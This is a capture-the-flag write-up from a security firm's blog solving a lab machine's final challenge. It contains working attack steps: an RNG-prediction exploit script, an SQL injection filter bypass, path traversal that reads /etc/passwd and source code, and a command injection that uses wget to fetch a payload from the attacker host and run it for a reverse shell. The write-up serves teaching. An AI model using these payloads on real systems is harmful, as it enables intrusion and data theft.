{"id":6965,"date":"2024-10-25T09:58:42","date_gmt":"2024-10-25T07:58:42","guid":{"rendered":"https:\/\/warpnet.nl\/?p=6965"},"modified":"2025-12-08T13:23:11","modified_gmt":"2025-12-08T12:23:11","slug":"ctf-2024-final-challange","status":"publish","type":"post","link":"https:\/\/warpnet.nl\/en\/blog\/ctf-2024-final-challange\/","title":{"rendered":"Warpnet CTF 2024 - Final Challenge"},"content":{"rendered":"

At the end of September, we hosted an online week-long Capture The Flag event on our Hacklabs platform. Participants had lots of fun playing and solving the challenges, and learning from each other after the competition. This ended with a finale at our office where the best participants played one final challenge to distribute the prizes. This post goes through the solution to this final challenge!<\/p>\n\n\n\n

Enumeration<\/h2>\n\n\n\n

This challenge consists of 9 flags hidden across various services and levels of depth in the machine. Multiple paths exist to reach the end.<\/p>\n\n\n\n

Starting with enumeration, an nmap<\/code> of the machine (10.8.0.82) shows the following open ports:<\/p>\n\n\n\n

$ sudo nmap -Pn -n -sV -sC -O -vv -oN nmap.txt -p- -sS -T4 10.8.0.82\n...\nNmap scan report for 10.8.0.82\nHost is up, received user-set (0.019s latency).\nScanned at 2024-10-19 15:58:08 CEST for 116s\nNot shown: 65529 closed ports\nReason: 65529 resets\nPORT     STATE SERVICE     REASON         VERSION\n22\/tcp   open  ssh         syn-ack ttl 61 OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)\n80\/tcp   open  http        syn-ack ttl 61 Werkzeug\/3.0.4 Python\/3.11.2\n| http-auth:\n| HTTP\/1.1 401 UNAUTHORIZED\\x0D\n|_  Basic realm=Authentication Required\n139\/tcp  open  netbios-ssn syn-ack ttl 61 Samba smbd 4.6.2\n445\/tcp  open  netbios-ssn syn-ack ttl 61 Samba smbd 4.6.2\n1337\/tcp open  waste?      syn-ack ttl 61\n3306\/tcp open  mysql       syn-ack ttl 61 MySQL 5.5.5-10.11.6-MariaDB-0+deb12u1<\/code><\/pre>\n\n\n\n
On this server, an SSH server is running on port 22, an HTTP server on port 80 requiring authentication, an SMB server on ports 139 and 445, and a MySQL server open on port 3306. Another unknown service on port 1337 is also open. We will explore these one by one.<\/p>\n\n\n\n
Port 1337: Casino RNG Manipulation<\/h2>\n\n\n\n
If we connect to port 1337<\/code> using netcat (nc<\/code>), we get a ton out [DEBUG]<\/code> output before a menu asking us to flip a coin or roll a dice:<\/p>\n\n\n\n
$ nc -v 10.8.0.82 1337\nConnection to 10.8.0.82 1337 port [tcp\/*] succeeded!\n[DEBUG] ZnJvbSB0ZXJtY29sb3IgaW1wb3J0IGNwcmludApmcm9tIGNvbG9yYW1hIGltcG9ydCBGb3JlCmZyb20gYmFz\n...\nZiJZb3Ugd2luISEhIHtGTEFHfSIsICJ5ZWxsb3ciKQogICAgICAgICAgICBicmVhawogICAgZWxzZToKICAgICAgICBjcHJpbnQoIkludmFsaWQgY2hvaWNlISIsICJyZWQiKQo=\n[DEBUG] (3, (2147483648, 1887914744, 2756020746, 201810272, 3359707872, 3156406226, 2992947414, 1530504030, 2648658794, 228605079,\n...\n4239002166, 3110075729, 11230755, 3014065313, 3922022629, 1767810001, 624), None)\n\nWelcome to the Casino!\n\n1. Flip coin\n2. Roll dice\nChoice:<\/code><\/pre>\n\n\n\n
The first line of debugging output looks suspiciously like Base64. After decoding the string using CyberChef<\/a>, we get the following Source Code<\/strong>:<\/p>\n\n\n\n
from termcolor import cprint\nfrom colorama import Fore\nfrom base64 import b64encode\nimport random\n\nfrom secret import FLAG\n\ncprint(f"[DEBUG] {b64encode(open(__file__, 'rb').read()).decode()}", "dark_grey")\ncprint(f"[DEBUG] {random.getstate()}", "dark_grey")\n\nprint()\ncprint("Welcome to the Casino!", "yellow", attrs=["blink"])\n\ndef coin_art(result):\n    if result == "Heads":\n        return """  ╓────╖\\n ╔╝    ╚╗\\n╔╝ █ █  ║\\n║  █▀█ ╔╝\\n╚╗ ▀ ▀╔╝\\n ╙────╜"""\n    else:\n        return """ ╓────╖\\n╔╝    ╚╗\\n║  ▀█▀ ╚╗\\n╚╗  █   ║\\n ╚╗ ▀  ╔╝\\n  ╙────╜"""\n\ndef dice_art(n):\n    if n == 1:\n        return """┌───────┐\\n│       │\\n│   •   │\\n│       │\\n└───────┘"""\n    elif n == 2:\n        return """┌───────┐\\n│ •     │\\n│       │\\n│     • │\\n└───────┘"""\n    elif n == 3:\n        return """┌───────┐\\n│ •     │\\n│   •   │\\n│     • │\\n└───────┘"""\n    elif n == 4:\n        return """┌───────┐\\n│ •   • │\\n│       │\\n│ •   • │\\n└───────┘"""\n    elif n == 5:\n        return """┌───────┐\\n│ •   • │\\n│   •   │\\n│ •   • │\\n└───────┘"""\n    elif n == 6:\n        return """┌───────┐\\n│ •   • │\\n│ •   • │\\n│ •   • │\\n└───────┘"""\n\nsixes = 0\nwhile True:\n    print()\n    print("1. Flip coin")\n    print("2. Roll dice")\n    choice = input("Choice: " + Fore.LIGHTCYAN_EX) or choice\n    print(Fore.RESET)\n    if choice == "1":\n        result = random.choice(["Heads", "Tails"])\n        cprint(coin_art(result) + f"\\nThe coin landed on {result}!", "green")\n    elif choice == "2":\n        result = random.randint(1, 6)\n        cprint(dice_art(result) + f"\\nThe dice roll was {result}!", "green")\n        if result == 6:\n            sixes += 1\n            cprint(f"Nice, your streak is at {sixes}\/100.", "green")\n        else:\n            sixes = 0\n            cprint(f"Not a 6, your streak is back to 0.", "light_red")\n\n        if sixes == 100:\n            cprint(f"You win!!! {FLAG}", "yellow")\n            break\n    else:\n        cprint("Invalid choice!", "red")<\/code><\/pre>\n\n\n\n
Reading the code, the first flip coin<\/em> option just executes random.choice()<\/code> between two strings and prints the result with some ASCII art. Next, the roll dice<\/em> option seems more interesting. If the result of random.randint(1, 6)<\/code> happened to be 6<\/code>, your stream stored in sixes<\/code> is increased by one. When you don’t roll a six, however, your streak is reset. When you reach a streak of 100 sixes in a row, the flag is printed.<\/p>\n\n\n\n
Mathematically, you won’t just get lucky by trying to roll the dice until you succeed. The probability of rolling a six is 1\/6<\/code>, which you need to do 100 times. Even if you would be able to do millions of attempts per second, it would take many universe lifetimes until you would hit a stream of 100. (calculation<\/a>)<\/p>\n\n\n\n
Instead, we have to abuse a vulnerability in the program. The second like of [DEBUG]<\/code> output shows a large array that comes from random.getstate()<\/code>. Reading the documentation<\/a>, we find that another method called random.setstate()<\/code> exists that takes the output of this object to reproduce a random state. This can be used to make predictions about what the random generator’s next output will be:<\/p>\n\n\n\n
>>> import random\n>>> state = random.getstate()\n>>> random.getrandbits(32)\n3774869789\n>>> random.getrandbits(32)\n2344517096\n>>> random.setstate(state)  # Reset the random state\n>>> random.getrandbits(32)\n3774869789\n>>> random.getrandbits(32)\n2344517096<\/code><\/pre>\n\n\n\n
The above shows that we can recover the full state of the RNG with this method to know in advance what it will output. Using the logic of the application, one idea would be to check locally if the next random.randint(1, 6)<\/code> would be a 6, and if it is not, flip coins (random.choice()<\/code>) until it is. Only then roll the dice to ensure it is always a six!<\/p>\n\n\n\n
We can implement this in Python to automate the process. The pwntools<\/a> library helps with TCP interaction, and tqdm<\/a> has a nice and simple progress bar. We will synchronize the random state with the remote server, and then flip coins until the dice would become a 6. Then, we roll the dice on the remote connection and do so for 100 rounds. This prints the flag at the end:<\/p>\n\n\n\n
from pwn import *\nfrom tqdm import tqdm\n\np = remote("10.8.0.82", 1337)\n\np.recvline()  # skip source code\nstate = p.recvline().split(b"[DEBUG] ")[1].split(b"\\x1b")[0]\nstate = safeeval.const(state)\nrandom.setstate(state)  # sync random state\n\n\nfor i in tqdm(range(100), desc="Rounds"):\n    # Synchronize state and iterate until the next dice roll is 6\n    while random.randint(1, 6) != 6:\n        random.setstate(state)\n        random.choice(["Heads", "Tails"])\n        p.sendlineafter(b"Choice: ", b"1")\n        state = random.getstate()\n\n    p.sendlineafter(b"Choice: ", b"2")\n    tqdm.write(p.recvline_contains(b"streak"))\n\np.interactive()  # CTF{y0U_mU5t_B3_v3e3eEE3ry_LuCKY}<\/code><\/pre>\n\n\n\n
SMB Share: PCAP Decryption<\/h2>\n\n\n\n
On ports 139 and 445, an SMB share is present. Without authentication, we can list the shares and find one named Final<\/code>:<\/p>\n\n\n\n
$ smbclient -L '\/\/10.8.0.82' -U '%'\n\nSharename       Type      Comment\n---------       ----      -------\nFinal           Disk      \nIPC$            IPC       IPC Service (Samba 4.17.12-Debian)<\/code><\/pre>\n\n\n\n
Connecting to it, we find one file named intercepted.zip<\/code>, which we can retrieve:<\/p>\n\n\n\n
$ smbclient '\/\/10.8.0.82\/Final' -U '%'\nTry "help" to get a list of possible commands.\nsmb: \\> ls\n  .                    D        0  Wed Oct  2 22:25:09 2024\n  ..                   D        0  Wed Oct  2 22:25:08 2024\n  intercepted.zip      N    74214  Wed Oct  2 22:25:09 2024\n\n                50620216 blocks of size 1024. 46381328 blocks available\nsmb: \\> get intercepted.zip\ngetting file \\intercepted.zip of size 74214 as intercepted.zip (589.2 KiloBytes\/sec) (average 589.2 KiloBytes\/sec)<\/code><\/pre>\n\n\n\n
After unzipping this file, we find final.pcapng<\/code> and file.log<\/code>:<\/p>\n\n\n\n
$ unzip intercepted.zip\nArchive:  intercepted.zip\n  inflating: final.pcapng\n  inflating: file.log\n$ file final.pcapng file.log\nfinal.pcapng: pcapng capture file - version 1.0\nfile.log:     ASCII text, with CRLF line terminators<\/code><\/pre>\n\n\n\n
The file.log<\/code> appears to be a TLS log file, containing handshake secrets:<\/p>\n\n\n\n
$ head file.log\n# SSL\/TLS secrets log file, generated by NSS\nCLIENT_HANDSHAKE_TRAFFIC_SECRET 891e51ebab72da9ade15c1630eebeffd34c05538d2fb77385f391a85db2f9cf6 952a30ad79baead50e0980b56deee3e8a4875f95d4687b18793f36381971903f\nSERVER_HANDSHAKE_TRAFFIC_SECRET 891e51ebab72da9ade15c1630eebeffd34c05538d2fb77385f391a85db2f9cf6 be949785a33829b2f463a73d327b00588db1c304f1683f58ce058f601ae7e823\nCLIENT_HANDSHAKE_TRAFFIC_SECRET bfe67bb03e21808f0b445256a4079362c7a88381305d1742de75a1bea45862b3 d060a08cd1f87fd8d6752413c18d2e564117b3c8a67ffc97e9a4b3ce97b8e413\nSERVER_HANDSHAKE_TRAFFIC_SECRET bfe67bb03e21808f0b445256a4079362c7a88381305d1742de75a1bea45862b3 221ef1787bf1ed9457dccd794cf1c10b3b5aec09dbcaed79a8c856bc43202e71\nCLIENT_TRAFFIC_SECRET_0 891e51ebab72da9ade15c1630eebeffd34c05538d2fb77385f391a85db2f9cf6 47821337da2a1d042b640331c4299f32a5106f8714090dbddd648bbfc5d0258d\nSERVER_TRAFFIC_SECRET_0 891e51ebab72da9ade15c1630eebeffd34c05538d2fb77385f391a85db2f9cf6 66b4b833b79c7327bc2b32da93b074371f3c60c7072cd9c60cf9595c3348b200\nEXPORTER_SECRET 891e51ebab72da9ade15c1630eebeffd34c05538d2fb77385f391a85db2f9cf6 84f5fce76f38d53f7fd8f29461696f85c607cb02bbe4a86f539de079ce39d59f\nCLIENT_TRAFFIC_SECRET_0 bfe67bb03e21808f0b445256a4079362c7a88381305d1742de75a1bea45862b3 7b41d30167eb04c53bd912590f9e5e63104e2ee789efdaa563032cda12f17522\nSERVER_TRAFFIC_SECRET_0 bfe67bb03e21808f0b445256a4079362c7a88381305d1742de75a1bea45862b3 16df67c12ea5bee3bfef9094a7fe2f063082acc0ff4c4f90d051b6b74d648553<\/code><\/pre>\n\n\n\n
The .pcapng<\/code> file can be opened in Wireshark<\/a>. This shows many different protocols, including a small tls<\/code> part. If we search about how to decrypt this TLS traffic, the Wireshark documentation explains<\/a> that in the preferences, a (Pre-)-Master-Secret<\/em> log file can be selected. This sounds a lot like what is given in file.log<\/code>.<\/p>\n\n\n\n
In Wireshark, we need to open Edit<\/em>->Preferences<\/em> and expand the Protocols<\/em> section. Then, find TLS<\/em> in this list and click Browse<\/em> on the last option. If we select our file.log<\/code> here and press OK, we find that all the tls<\/code> traffic has been decrypted!<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
Looking at the Server Hello<\/code> message of the TLS handshake, we find a new tab named Decrypted TLS<\/em>. This contains the encrypted data about the certificate that is sent to the client. It includes a flag in multiple parts of the certificate, the issuer<\/code> and subject<\/code>.<\/p>\n\n\n\n
Flag: CTF{TLS_C3RT1F1C4T3_F0UND}<\/code><\/p>\n\n\n\n
<\/a>PCAP: Extracting PDF<\/h2>\n\n\n\n
There is now http<\/code> traffic that posts to a \/upload<\/code> URL with Content-Type: application\/pdf<\/code>. We can try to extract this data manually, but Wireshark has an option in File<\/em> -> Export Objects<\/em> -> HTTP…<\/em> to Save all<\/em> objects to any directory. This will write the \/upload<\/code> form data including the PDF.<\/p>\n\n\n\n
$ cat upload\n-----------------------------1285009858361488843608501223\nContent-Disposition: form-data; name="file"; filename="Ticket ID.pdf"\nContent-Type: application\/pdf\n\n%PDF-1.7\n...\n38585\n%%EOF\n-----------------------------1285009858361488843608501223--<\/code><\/pre>\n\n\n\n
The file appears to still contain form boundaries, but PDF looks for the header and trailer at any location in the file. If we just rename it to upload.pdf<\/code>, we can open it with any PDF reader. Here, we read the following:<\/p>\n\n\n\n
\n
Ticket ID<\/strong>: #195521
Ticket Title<\/strong>: Issue Connecting to server
Description<\/strong>: I’m experiencing an issue while trying to connect to an internal application on my Linux machine. When I attempt to launch the app via the terminal, I’m receiving the following error message<\/p>\n\n\n\n
user@ubuntu:~$ .\/connect.sh\nPlease provide password: [BLURRED_PASSWORD]\n[ERROR] Connection failed: Unable to reach the server\n[ERROR] Timeout occurred during handshake\n[ERROR] CTF{D0NT_BL4R_P4SSW0RDS}\n[ERROR] Exiting application with code 1<\/code><\/pre>\n\n\n\n
I’ve already tried the following troubleshooting steps:<\/p>\n\n\n\n
    \n
  1. Verified network connectivity (pinged the server, which responded correctly).<\/li>\n\n\n\n
  2. Restarted the application and my machine.<\/li>\n\n\n\n
  3. Checked the firewall settings—nothing seems to be blocking the application.<\/li>\n<\/ol>\n\n\n\n
    Let me know if you need any additional information. Thank you!<\/p>\n<\/blockquote>\n\n\n\n
    A flag can be found in the contents: CTF{D0NT_BL4R_P4SSW0RDS}<\/code><\/p>\n\n\n\n
    <\/a>PDF: Unblurring Password<\/h2>\n\n\n\n
    An image is placed over the Please provide password:<\/code> prompt with what looks to be a blurred password. We can extract the full image using Python or the pdfimages<\/code> command:<\/p>\n\n\n\n
    $ pdfimages upload.pdf -all out\n$ file out-000.png\nout-000.png: PNG image data, 205 x 15, 8-bit\/color RGB, non-interlaced<\/code><\/pre>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    The image is still unreadable to the human eye, but tools such as Depix<\/a> exist to try and brute force characters and match<\/strong> the generated blurred squares. Running this tool over the image with the debruinseq_notepad_Windows10_closeAndSpaced.png<\/code> example usage, a slightly readable image is generated.<\/p>\n\n\n\n
    depix -p out-000.png -s images\/searchimages\/debruinseq_notepad_Windows10_closeAndSpaced.png -o unblurred.png<\/code><\/pre>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    The image is still unreadable to the human eye, but tools such as Depix<\/a> exist to try and brute force characters and match<\/strong> the generated blurred squares. Running this tool over the image with the debruinseq_notepad_Windows10_closeAndSpaced.png<\/code> example usage, a slightly readable image is generated.<\/p>\n\n\n\n
    \n
    Hello from the other side<\/p>\n<\/blockquote>\n\n\n\n
    You might have also recognized the image\/text from the example in the Depix documentation<\/a>.<\/p>\n\n\n\n
    This password allows us to log in to the Web Application on port 80. The username is user<\/code> as found on the console in the PDF (user@ubuntu:~$<\/code>).<\/p>\n\n\n\n
    $ curl -D - 'http:\/\/10.8.0.82'\nHTTP\/1.1 401 UNAUTHORIZED\nServer: Werkzeug\/3.0.4 Python\/3.11.2\nDate: Sat, 19 Oct 2024 15:11:51 GMT\nContent-Type: text\/html; charset=utf-8\nContent-Length: 19\nWWW-Authenticate: Basic realm="Authentication Required"\nConnection: close\n\nUnauthorized Access<\/code><\/pre>\n\n\n\n
    The web application requires ‘Basic Authentication’, which curl supports with -u<\/code>:<\/p>\n\n\n\n
    $ curl -D - -u 'user:Hello from the other side' 'http:\/\/10.8.0.82'\nHTTP\/1.1 302 FOUND\nServer: Werkzeug\/3.0.4 Python\/3.11.2\nDate: Sat, 19 Oct 2024 15:12:11 GMT\nContent-Type: text\/html; charset=utf-8\nContent-Length: 197\nLocation: \/ftp\/\nConnection: close\n\n<!doctype html>\n<html lang=en>\n<title>Redirecting...<\/title>\n<h1>Redirecting...<\/h1>\n<p>You should be redirected automatically to the target URL: <a href="\/ftp\/">\/ftp\/<\/a>. If not, click the link.<\/code><\/pre>\n\n\n\n
    We are successfully authenticated and can now access the web application on \/ftp\/<\/code>.<\/p>\n\n\n\n
    Web Application: SQL Injection<\/h2>\n\n\n\n
    An alternative method of authenticating to the web application without the PDF extraction and password unblurring is by attacking the Basic Authentication scheme it uses.<\/p>\n\n\n\n
    Inputting any wrong combination just results in an “Unauthorized Access” message:<\/p>\n\n\n\n
    $ curl -u 'user:pass' 'http:\/\/10.8.0.82\/'\nUnauthorized Access<\/code><\/pre>\n\n\n\n
    We can try some special characters<\/strong> in the username and\/or password to see if the application responds differently:<\/p>\n\n\n\n
    $ curl -u 'user")]}{[(*%:pass")]}{[(*%' 'http:\/\/10.8.0.82\/'\nBlocked symbol: '('<\/code><\/pre>\n\n\n\n
    It sure does! But it is blocking one of our special characters. We can remove it and continue until we find which aren’t blocked:<\/p>\n\n\n\n
    $ curl -u 'user")]}{[*%:pass' 'http:\/\/10.8.0.82\/'\nBlocked symbol: ')'\n$ curl -u 'user"]}{[*%:pass' 'http:\/\/10.8.0.82\/'\nBlocked symbol: '*'\n$ curl -u 'user"]}{[%:pass' 'http:\/\/10.8.0.82\/'\nBlocked symbol: '%'\n$ curl -u 'user"]}{[:pass' 'http:\/\/10.8.0.82\/'\nYou have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ']}{[" AND password="pass"' at line 1\n$ curl -u 'user":pass' 'http:\/\/10.8.0.82\/'\nYou have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'pass"' at line 1<\/code><\/pre>\n\n\n\n
    Suddenly, a MySQL error appears! This happens when we only put a "<\/code> character in our username\/password. A great sign at SQL Injection. The SQL statement we are attacking is likely similar to this:<\/p>\n\n\n\n
    SELECT * FROM users WHERE username = "user" AND password = "pass";\n-- Injected:\nSELECT * FROM users WHERE username = "user"" AND password = "pass";<\/code><\/pre>\n\n\n\n
    Normally, we could bypass this by continuing the syntax of the query after closing the username quote. Using " OR 1=1;-- -<\/code> as a payload, it should make the condition always true and ignore the password:<\/p>\n\n\n\n
    SELECT * FROM users WHERE username = "" OR 1=1;-- -" AND password = "pass";<\/code><\/pre>\n\n\n\n
    $ curl -u 'user" OR 1=1;-- -:pass' 'http:\/\/10.8.0.82\/'\nBlocked keyword: 'OR'<\/code><\/pre>\n\n\n\n
    Unfortunately, the filter also blocks keywords like “OR”, and it is case-insensitive. Even if we were able to find a different useful keyword here, the =<\/code> and -<\/code> characters are blocked as well.<\/p>\n\n\n\n
    Commenting out the rest of the query isn’t entirely needed in this case, because we can just repeat the always-true payload for the username in the password to pass its check. The question is, how do we make a condition always true with all these filters blocking special characters and keywords?<\/p>\n\n\n\n
    We can check the documentation<\/a> for more operators like OR<\/code>. Instead of working with booleans, MySQL can also perform integer operations on strings by silently casting them. The following page can be used to easily play around with queries to understand what is happening.<\/p>\n\n\n\n
    https:\/\/www.db-fiddle.com\/f\/928DfgRkMHCZri3ryqhWuu\/0<\/a><\/p>\n\n\n\n
    Let’s take the following query, and understand what happens:<\/p>\n\n\n\n
    SELECT * FROM users WHERE username=""-0;<\/code><\/pre>\n\n\n\n
    When running it on DB Fiddle, all records are returned. Why is that? Well, we need to evaluate the WHERE<\/code> expression just like MySQL would. We need to understand “Type Conversion”<\/a> and “Operator Precedence”<\/a>.
    Subtraction happens before equals, and strings that don’t look like numbers are converted to 0. We look at the expression here and see that it evaluates to the following:<\/p>\n\n\n\n
    username=""-0;\n"user"=""-0;\n"user"=(""-0);\n"user"=0;\n0=0;\n1;\nTRUE;<\/code><\/pre>\n\n\n\n
    That is why the weird expression above resulted in all records being returned. Still, -<\/code> is a blocked character, but maybe we can come up with different unblocked operators that abuse these same rules. This turns out to be pretty easy because all we need to do is implicitly cast the input string to an integer, which will be 0, and is then always compared to another 0.<\/p>\n\n\n\n
    The \/<\/code> (divide) operator has an alternative representation as DIV<\/code>. By dividing a string by a number like 1, it is turned into 0, equaling the other string that also casts to 0. The following works:<\/p>\n\n\n\n
    SELECT * FROM users WHERE username=""DIV 1;<\/code><\/pre>\n\n\n\n
    However, this still isn’t enough because our injection also ends with a "<\/code> character. If we were to inject username=""DIV"";<\/code>, the strings would cast to 0 and 0\/0 = null<\/code>. username=null<\/code> won’t be true, so we won’t bypass the check. Instead, we can make the string cast to 1 by letting it be "1"<\/code>:<\/p>\n\n\n\n
    SELECT * FROM users WHERE username=""DIV"1";\n-- What happens in the background:\nSELECT * FROM users WHERE "user"=(""DIV"1");\nSELECT * FROM users WHERE "user"=(0 DIV 1);\nSELECT * FROM users WHERE "user"=0;\nSELECT * FROM users WHERE 0=0;\nSELECT * FROM users WHERE TRUE;<\/code><\/pre>\n\n\n\n
    This creates an always-true condition and<\/em> bypasses the SQL Injection filter in the application, successfully logging us in when put in both the username and password:<\/p>\n\n\n\n
    $ curl -u '"DIV"1:"DIV"1' 'http:\/\/10.8.0.82\/'\n<!doctype html>\n<html lang=en>\n<title>Redirecting...<\/title>\n<h1>Redirecting...<\/h1>\n<p>You should be redirected automatically to the target URL: <a href="\/ftp\/">\/ftp\/<\/a>. If not, click the link.<\/code><\/pre>\n\n\n\n
    This allows us to look at the authenticated \/ftp\/<\/code> page.<\/p>\n\n\n\n
    Web Application: Local File Read<\/h2>\n\n\n\n
    After authenticating, the web page looks like this:<\/p>\n\n\n\n
    $ curl -u 'user:Hello from the other side' 'http:\/\/10.8.0.82\/ftp\/'\n<h1>WebFTP<\/h1>\n<ul>\n <li><a href="\/ftp\/?filename=file.txt">file.txt<\/a><\/li>\n <li><a href="\/ftp\/dir">dir\/<\/a><\/li>\n<\/ul>\n<form method="post" enctype="multipart\/form-data">\n <input type="file" name="file" \/>\n <input type="submit" value="Upload" \/>\n<\/form><\/code><\/pre>\n\n\n\n
    We can upload and download files here, like an FTP server. All endpoints detect the use of ..\/<\/code> for path traversal vulnerabilities, but one parameter misses this check. When downloading the file, the URL path and filename parameter are appended together. This URL path that serves as the directory is missing a ..\/<\/code> check, allowing it to traverse to any directory:<\/p>\n\n\n\n
    \n
    Tip<\/strong>: When using curl or the browser, ..\/<\/code> sequences in the path are automatically removed and won’t be sent to the remote server. Use a proxy like Burp Suite or the --path-as-is<\/code> argument to have more control.<\/p>\n<\/blockquote>\n\n\n\n
    $ curl --path-as-is -u 'user:Hello from the other side' 'http:\/\/10.8.0.82\/ftp\/..\/..\/..\/etc?filename=passwd'\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\n...<\/code><\/pre>\n\n\n\n
    This allows us to enumerate the server. From looking at the headers, we know that a Python server is hosting this application. Using only a single ..\/<\/code> sequence, we can hopefully traverse outside of the files\/<\/code> directory into the source code. Then, Python applications often have a requirements.txt<\/code> file which we can read to confirm:<\/p>\n\n\n\n
    $ curl --path-as-is -u 'user:Hello from the other side' 'http:\/\/10.8.0.82\/ftp\/..\/?filename=requirements.txt'\nFlask\nFlask-HTTPAuth\nmariadb<\/code><\/pre>\n\n\n\n
    Next, we can try to find the source code itself in app.py<\/code> or main.py<\/code>:<\/p>\n\n\n\n
    $ curl --path-as-is -u 'user:Hello from the other side' 'http:\/\/10.8.0.82\/ftp\/..\/?filename=app.py'\nFile not found\n$ curl --path-as-is -u 'user:Hello from the other side' 'http:\/\/10.8.0.82\/ftp\/..\/?filename=main.py'\nfrom flask import Flask, redirect, render_template, request, send_file, Response\nfrom flask_httpauth import HTTPBasicAuth\n...<\/code><\/pre>\n\n\n\n
    Great, we found the main source code file. Here, we find a database configuration with credentials. We remember from the nmap<\/code> output that MySQL is exposed to the outside, so we can try to connect to it.<\/p>\n\n\n\n
    app = Flask(__name__)\nauth = HTTPBasicAuth()\nDB_CONFIG = {\n    'host': 'localhost',\n    'port': 3306,\n    'user': 'webftp',\n    'password': 'D@t4b4s3_P@55w0rd_f0r_W3bFTP!_2cacfa07',\n    'database': 'webftp'\n}\n...\n@auth.verify_password\ndef verify_password(username, password):\n    for input in [username, password]:\n        for blocked in ["UNION", "SELECT", "WHERE", "AND", "OR", "XOR", "LIKE", "RLIKE", "REGEXP"]:\n            if re.search(rf"\\b{re.escape(blocked)}\\b", input, re.IGNORECASE):\n                raise ValueError(f"Blocked keyword: {blocked!r}")\n        for blocked in "()&|^=<>+-*\/%":\n            if blocked in input:\n                raise ValueError(f"Blocked symbol: {blocked!r}")\n\n    data = sql_query(\n        f"SELECT username FROM users WHERE username=\\"%s\\" AND password=\\"%s\\"" % (username, password))\n\n    if len(data) > 0:\n        os.system(f"echo '{data[0][0]} logged in' >> \/var\/log\/webftp.log")\n        return True<\/code><\/pre>\n\n\n\n
    We can also notice the verify_password()<\/code> function with the SQL Injection filter from earlier, as well as a suspicious os.system()<\/code> call with output from the SQL query.<\/p>\n\n\n\n
    Let’s connect to the database and enumerate it:<\/p>\n\n\n\n
    $ mysql -h 10.8.0.82 -u webftp -p webftp\nEnter password: D@t4b4s3_P@55w0rd_f0r_W3bFTP!_2cacfa07\n\nMariaDB [webftp]> show tables;\n+------------------+\n| Tables_in_webftp |\n+------------------+\n| flag             |\n| users            |\n+------------------+\n2 rows in set (0.019 sec)\n\nMariaDB [webftp]> select * from flag;\n+--------------------------------------------------+\n| flag                                             |\n+--------------------------------------------------+\n| CTF{cr4ck3d_th3_d4t4b453?_n0w_cr4ck_th3_5y5t3m!} |\n+--------------------------------------------------+\n1 row in set (0.023 sec)<\/code><\/pre>\n\n\n\n
    Another flag found: CTF{cr4ck3d_th3_d4t4b453?_n0w_cr4ck_th3_5y5t3m!}<\/code><\/p>\n\n\n\n
    Web Application: Command Injection<\/h2>\n\n\n\n
    Above we have just gotten access to the database, and found the logic of logging in. os.system()<\/code> is called with the username after a successful login, input enclosed on '<\/code> quotes. We could inject '; id; '<\/code> to execute an arbitrary id<\/code> command. The user doesn’t exist yet, but with access to the database, we can create it. Note that if we want to input the username later, we need to still bypass the blocked characters from the SQL Injection filter. Either by finding the initial Login Bypass which doesn’t require inputting the username, or by making a payload that doesn’t require any blocked characters:<\/p>\n\n\n\n
    MariaDB [webftp]> UPDATE users SET username="';rm index.html;wget 10.9.0.77;sh index.html;'";\nQuery OK, 1 row affected (0.055 sec)\nRows matched: 1  Changed: 1  Warnings: 0\n\nMariaDB [webftp]> select * from users;\n+----+------------------------------------------------+---------------------------+\n| id | username                                       | password                  |\n+----+------------------------------------------------+---------------------------+\n|  1 | ';rm index.html;wget 10.9.0.77;sh index.html;' | hello from the other side |\n+----+------------------------------------------------+---------------------------+\n1 row in set (0.024 sec)\n<\/a><\/code><\/pre>\n\n\n\n
    Now we host our payload to download, and a reverse shell, then log in to trigger it:<\/p>\n\n\n\n
    $ curl --path-as-is -u "';rm index.html;wget 10.9.0.77;sh index.html;':Hello from the other side" 'http:\/\/10.8.0.82\/'<\/code><\/pre>\n\n\n\n
    $ sudo python3 -m http.server 80\nServing HTTP on 0.0.0.0 port 80 (http:\/\/0.0.0.0:80\/) ...\n192.168.96.1 - - [19\/Oct\/2024 21:56:38] "GET \/ HTTP\/1.1" 200 -<\/code><\/pre>\n\n\n\n
    $ nc -lnvp 1337\nListening on 0.0.0.0 1337\nConnection received on 192.168.96.1 1976\nsh: 0: can't access tty; job control turned off\n$ id\nuid=33(www-data) gid=33(www-data) groups=33(www-data)<\/code><\/pre>\n\n\n\n
    We now have a shell! After enumerating the system for a bit, you may notice the \/getflag<\/code> binary:<\/p>\n\n\n\n
    $ ls -la \/\ntotal 540\n...\n-rwx--x--x   1 root   root    474704 Oct  2 20:26 getflag<\/code><\/pre>\n\n\n\n
    Running it will grant one flag of the current user (www-data<\/code>). It also explains that there are two more user flags for the admin<\/code> and root<\/code> user.<\/p>\n\n\n\n
    $ getflag\nGet the flag for the current user. Only 'www-data', 'admin' and 'root' have flags.\nCongratulations!\nwww-data's flag is: CTF{dubdubdub_f0r_y0u_n3v3r_tru5t_th3_d4t4b453}<\/code><\/pre>\n\n\n\n
    Environment Variables<\/h2>\n\n\n\n
    During enumeration, you may have run LinPEAS<\/a>. One of its steps is to look at the Environment Variables for interesting information.<\/p>\n\n\n\n
    $ env\nSUPERVISOR_GROUP_NAME=webftp\nHISTCONTROL=ignorespace\nHOSTNAME=8eaa3d121ffd\nPWD=\/opt\/webftp\nHOME=\/root\nFLAG=CTF{h0p3_y0u_d1dnt_n0t1c3_m3_t00_14t3...}\nWERKZEUG_SERVER_FD=3\nTERM=xterm-256color\nSHLVL=3\nLC_CTYPE=C.UTF-8\nPS1=$(command printf "\\[\\033[01;31m\\](remote)\\[\\033[0m\\] \\[\\033[01;33m\\]$(whoami)@$(hostname)\\[\\033[0m\\]:\\[\\033[1;36m\\]$PWD\\[\\033[0m\\]\\$ ")\nSUPERVISOR_PROCESS_NAME=webftp\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin\nSUPERVISOR_ENABLED=1\n_=\/usr\/bin\/env<\/code><\/pre>\n\n\n\n
